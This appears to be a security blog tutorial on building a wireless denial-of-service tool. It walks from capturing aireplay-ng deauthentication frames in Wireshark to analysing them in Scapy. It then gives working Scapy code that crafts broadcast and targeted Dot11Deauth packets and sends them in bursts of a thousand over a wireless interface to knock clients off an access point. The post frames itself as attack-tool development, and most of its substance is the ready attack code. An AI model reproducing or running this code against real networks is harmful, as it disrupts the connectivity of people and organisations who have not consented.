Developing Attack Tools – Scapy

In this article I will talk to you about the process of developing an attack tool. As an example, we will develop a wireless network DoS tool. We will follow the steps below for this

  1. How to Work?
  2. Run attack tool for sample packets
  3. Capture traffic with wireshark for analysis
  4. Exporting specific packets with wireshark for detail analysis
  5. Import exported specific packets to scapy console for analysis
  6. Analysis packets for detail informations
  7. Craft a packet with scapy
  8. Send packets to target

 

How to Work?

First we have to answer this question. Because if you do not know how a system works, you can not develop an attack or defense. We should answer the following question for this example:

  • How does a client’s connection break from the access point?

answerThe main problem here is deauthentication packets.

 

Run attack tool for sample packets (Reverse Engineering)

For this reason, we will need these packets. This step is actually a reverse engineering step. In this step, we will run aireplay-ng.

We need two types of packet for this process:

  1. Broadcast deauthentication packets
  2. Not broadcast

Broadcast

~ Not broadcast

 

Capture traffic with wireshark for analysis || Exporting specific packets

After running the aireplay-ng tool, we capture sample packets with wireshark. After capturing the packages, we export sample packages from the main menu of Wireshark by following the path File -> Export Specific Packet.

 

Import exported specific packets to scapy console for analysis

In the shell of the Scapy tool we import the files for analysis with the rdpcap function.

detail information for deauthentication packets (Layers)

~ Broadcast

addr1 = Destination
addr2 = Source
addr3 = Source
addr4 = None

~ Not broadcast

addr1 = Destination
addr2 = Source
addr3 = Destination
addr4 = None

 

Craft a packet with scapy

broadcast = RadioTap() / Dot11(addr1=broad, addr2=bssid.lower(), addr3=bssid.lower())/Dot11Deauth()

direct = RadioTap() / Dot11(addr1=bssid, addr2=client.lower(), addr3=bssid)/Dot11Deauth()

 

Send Packet(s) to Target(s)

Finally, we send the packets we created to the destination 🙂

Direct

sendp(direct, iface='wlan0', count=1000, inter = .2, verbose=False)

Broadcast

sendp(broadcast, iface='wlan0', count=1000, inter = .2, verbose=False)

 

Source code

Besim ALTINOK

Cyber Security Researcher

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir